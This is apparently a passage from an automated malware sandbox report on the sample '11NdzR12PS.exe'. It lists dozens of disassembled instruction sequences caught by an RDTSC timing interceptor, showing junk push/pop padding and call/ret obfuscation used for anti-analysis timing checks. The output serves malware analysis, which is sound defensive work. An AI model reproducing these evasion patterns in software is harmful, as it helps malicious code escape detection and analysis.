                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F4E72E second address: F4E747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F4E747 second address: F4E74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F4E74B second address: F4E787 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FF34080AB11h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jp 00007FF34080AB06h 0x00000020 popad 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jnp 00007FF34080AB08h 0x0000002e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F4E787 second address: F4E791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF3408102F6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5313C second address: F53162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF34080AB10h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FF34080AB06h 0x00000015 jnc 00007FF34080AB06h 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F53162 second address: F53192 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3408102F6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF3408102FAh 0x00000015 jmp 00007FF340810306h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F53192 second address: F531B8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF34080AB1Bh 0x00000008 jmp 00007FF34080AB15h 0x0000000d push eax 0x0000000e jg 00007FF34080AB06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F52619 second address: F5261F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F52760 second address: F527AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Ch 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007FF34080AB0Dh 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 je 00007FF34080AB06h 0x0000001c jng 00007FF34080AB06h 0x00000022 popad 0x00000023 pushad 0x00000024 jmp 00007FF34080AB13h 0x00000029 jng 00007FF34080AB06h 0x0000002f push edi 0x00000030 pop edi 0x00000031 popad 0x00000032 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F52CB8 second address: F52CBE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F52CBE second address: F52CDC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007FF34080AB06h 0x00000009 pop edi 0x0000000a push esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FF34080AB08h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F52CDC second address: F52CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F52CE2 second address: F52CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F52CE6 second address: F52D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810304h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F52D00 second address: F52D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Ch 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F52E68 second address: F52E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007FF3408102F6h 0x00000011 pop ebx 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F53987 second address: F5398F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F53EB9 second address: F53EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5467D second address: F5468A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F54829 second address: F54833 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF3408102FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F549D2 second address: F549D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F54B22 second address: F54B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F550C6 second address: F550CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F550CB second address: F550D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF3408102F6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F569AB second address: F569F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB10h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FF34080AB10h 0x00000012 jmp 00007FF34080AB0Bh 0x00000017 popad 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jo 00007FF34080AB12h 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FF34080AB0Ah 0x00000028 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F558EF second address: F558F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F558F4 second address: F558FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F582F3 second address: F582F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F582F7 second address: F5835B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FF34080AB08h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 jmp 00007FF34080AB12h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FF34080AB08h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 xchg eax, ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5835B second address: F58365 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F58365 second address: F5836A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5836A second address: F58370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5BFCD second address: F5BFDD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FF34080AB0Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5A261 second address: F5A26B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF3408102F6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5BFDD second address: F5BFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5BFE9 second address: F5BFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5DA0E second address: F5DA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F5DA12 second address: F5DA23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edi 0x00000009 jng 00007FF3408102FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6158C second address: F61592 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F61592 second address: F61598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F61598 second address: F6159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6159C second address: F61633 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b ja 00007FF340810306h 0x00000011 push 00000000h 0x00000013 je 00007FF340810303h 0x00000019 jmp 00007FF3408102FDh 0x0000001e sub dword ptr [ebp+122D3542h], ebx 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007FF3408102F8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 mov dword ptr [ebp+12452F13h], ecx 0x00000046 jng 00007FF3408102FCh 0x0000004c xor edi, 345547FBh 0x00000052 jmp 00007FF340810306h 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b jnc 00007FF3408102F6h 0x00000061 pushad 0x00000062 popad 0x00000063 popad 0x00000064 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6250C second address: F62512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F62512 second address: F62516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F62516 second address: F62577 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FF34080AB08h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D37F6h], edx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FF34080AB08h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 movzx ebx, ax 0x00000048 push 00000000h 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F62577 second address: F6257B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6257B second address: F62581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F62581 second address: F62587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F62587 second address: F6258B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F64461 second address: F644C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jne 00007FF3408102F8h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FF3408102F8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov ebx, dword ptr [ebp+122D2B82h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FF3408102F8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b push 00000000h 0x0000004d mov dword ptr [ebp+12484291h], edx 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F636B7 second address: F636BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F636BB second address: F63715 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D38A5h], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, edx 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 add di, 5C19h 0x00000028 mov eax, dword ptr [ebp+122D0C55h] 0x0000002e mov dword ptr [ebp+122D184Eh], edi 0x00000034 push FFFFFFFFh 0x00000036 add edi, 568EA3B1h 0x0000003c mov ebx, dword ptr [ebp+122D1BEFh] 0x00000042 nop 0x00000043 pushad 0x00000044 jmp 00007FF340810302h 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c pop esi 0x0000004d rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F63715 second address: F63719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F64667 second address: F64682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810307h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F65748 second address: F6574C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6660F second address: F66614 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F66614 second address: F66621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6A3A3 second address: F6A3A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6B48D second address: F6B491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6C3E5 second address: F6C3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6C3EC second address: F6C403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6C403 second address: F6C407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6C407 second address: F6C40B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F694AD second address: F694B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6A5FB second address: F6A606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF34080AB06h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6D314 second address: F6D319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6C5B9 second address: F6C5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6C5BF second address: F6C5C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6D3CE second address: F6D3D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6C662 second address: F6C666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6C666 second address: F6C66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6D530 second address: F6D5C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810305h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF340810303h 0x0000000f nop 0x00000010 cmc 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f jmp 00007FF340810300h 0x00000024 mov eax, dword ptr [ebp+122D0A19h] 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FF3408102F8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 movzx edi, ax 0x00000047 push FFFFFFFFh 0x00000049 mov dword ptr [ebp+12460B3Fh], ebx 0x0000004f mov ebx, dword ptr [ebp+1245A942h] 0x00000055 nop 0x00000056 pushad 0x00000057 pushad 0x00000058 push eax 0x00000059 pop eax 0x0000005a pushad 0x0000005b popad 0x0000005c popad 0x0000005d push ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6D5C0 second address: F6D5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6D5D0 second address: F6D5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6E5D6 second address: F6E5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6E5DA second address: F6E5E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6E5E4 second address: F6E5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F6E691 second address: F6E697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F7052D second address: F70532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F0B81D second address: F0B828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF3408102F6h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F0B828 second address: F0B82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F0B82E second address: F0B861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF340810308h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF3408102FAh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
